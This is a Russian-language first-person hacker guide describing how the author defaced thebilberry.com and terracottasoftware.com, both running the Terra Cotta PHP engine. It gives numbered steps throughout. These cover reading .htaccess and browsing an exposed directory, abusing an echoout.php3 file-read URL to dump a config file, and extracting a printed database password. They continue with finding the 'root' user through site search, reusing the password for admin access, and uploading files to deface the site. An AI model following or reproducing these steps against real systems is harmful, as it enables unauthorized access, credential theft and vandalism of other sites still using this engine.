Как был взломан thebilberry.com

Дефейсу поверглись 2 родственных сайта, www.terracottasoftware.com
и www.thebilberry.com,
лежащие в соседних папках на одном серваке, но я не успел
дефейс нигде зафиксировать так как уже через 15 минут сервер стал недоступен. 27 февраля сервер ожил.
www.thebilberry.com был восстановлен, а вот на www.terracottasoftware.com почему-то
дефейс по-прежнему стоял. Обновили Apache, РНР, Sendmail, закрыли 3306,113, 1024 порты,
оставив открытыми всего 3 порта: 80, 25, 143. Я задефейсил сайты повторно и быстренько оформил
это дело на void-е. Потом вернул все на свои места, почти.

На обоих сайтах стоит сайтовый движок на РНР - Terra Cotta.
www.terracottasoftware.com - это сайт разработчиков, который доступен сейчас по адресу
www.terracottasoftware.com/index2.php3. Судя по большому количеству пользователей,
зарегистрированных на сайте, возможно в сети все еще есть сайты на этом движке.
Первым подвергся дефейсу www.thebilberry.com, поэтому о нем я и расскажу.
Для www.terracottasoftware.com все так же 100%. Может то, что я сейчас напишу и детский сад,
но я сделал так насколько позволили мне мои знания, по крайней мере я не пользовался никакими
чужими наработками, все чистой воды мои придумки.

Вот инструкция:

1. В оперу - www.thebilberry.com/.htaccess
Получаем в окне оперы:
php_value auto_prepend_file "/u/web/tc/core/local.mdl" order deny,allow deny from all

2. Пробуем на доступ перечисленные выше папки, в итоге:
www.thebilberry.com/tc/
Получаем : Index of /tc + кучу файлов и папок

3. Идем в www.thebilberry.com/tc/core/
Пробуем открыть www.thebilberry.com/tc/core/local.mdl - отказано в доступе.
Пробуем открыть www.thebilberry.com/tc/core/local.mdl.dist - ничего интересного.
Пробуем открывать все что там лежит.

4. www.thebilberry.com/tc/core/corenucl.php3 - запускается.
Получаем в окне оперы много чего, но из этого многого обращаем внимание на такую строчку:
http://www.thebilberry.com/tc/nucleus/echoout.php3 ?auth=2f49f92cfa2bce7464e871c79c673aa3&file=
%2Ftc%2Fcore%2Flocal.mdl.dist

5. local.mdl.dist - нас не интересует поэтому заказываем local.mdl
http://www.thebilberry.com/tc/nucleus/echoout.php3 ?auth=2f49f92cfa2bce7464e871c79c673aa3&file=
%2Ftc%2Fcore%2Flocal.mdl
Получаем пустое окно

6. Даем команду отобразить исходный текст. Среди прочего замечаем интересное:
$TC_LOCALDATA["dbuser"] = "web";
$TC_LOCALDATA["dbpw"] = "Dv4b074a";

7. Ищем куда бы можно было бы это ввести. Находим:
www.thebilberry.com/tc/login/index.php3
Вводим в поля Login : web
Password : Dv4b074a
Неверное имя или пароль.

8. Предположим, что неверен логин (другое предполагать не хочется). Можно конечно попробовать другие стандартные логины наугад, а можно поступить продуктивнее.

9. Ищем скрипт осуществляющий поиск по сайту:
www.thebilberry.com/tc/index/index.php3

Вводим в появившееся поле "web"
No matching users
Вводим "admin"
No matching users
Вводим "root"
Search Results:
Users
root
Есть!

10. Гоу ту пункт 7 и вводим:
Login : root
Password : Dv4b074a
Выбрасывает на главную страницу сайта.

11. Предполагаем, что теперь у нас есть административные полномочия и заходим в
www.thebilberry.com/tc/admin/.

12. Все ОК, открывается административная страница в которой расположены ссылки на все установленные модули Terra Cotta.

Вот в общем-то и все. Для дефейса нас интересует ссылка что-то типа Files manager
с админовской страницы. В открывшемся окне можно что угодно делать с файлами в директории сайта.
Кроме того, там же есть ссылка предлагающая загрузить что-либо на сайт.
По ней откроется окно, в котором щелкнув по кнопке обзор необходимо указать файл на своем компе который и будет
перемещен на сайт.

Да и еще, в пункте 5 приведенная строка работает только 1 раз.
Если необходимо еще раз загрузить local.mdl, то необходимо вернуться к пункту 4
и загрузить новый вариант этой строки. Ну и пароль я несколько
изменил. Для того, чтобы быстро находить нужные скрипты на сайте можно
скачать сам движок terracotta.tar.gz с www.terracottasoftware.com,
распакованный в папку tc он полностью повторяет структуру сайта,
а документация в целом объясняет, что для чего нужно.
Вот пожалуй и все, что я хотел рассказать.

Похожие материалы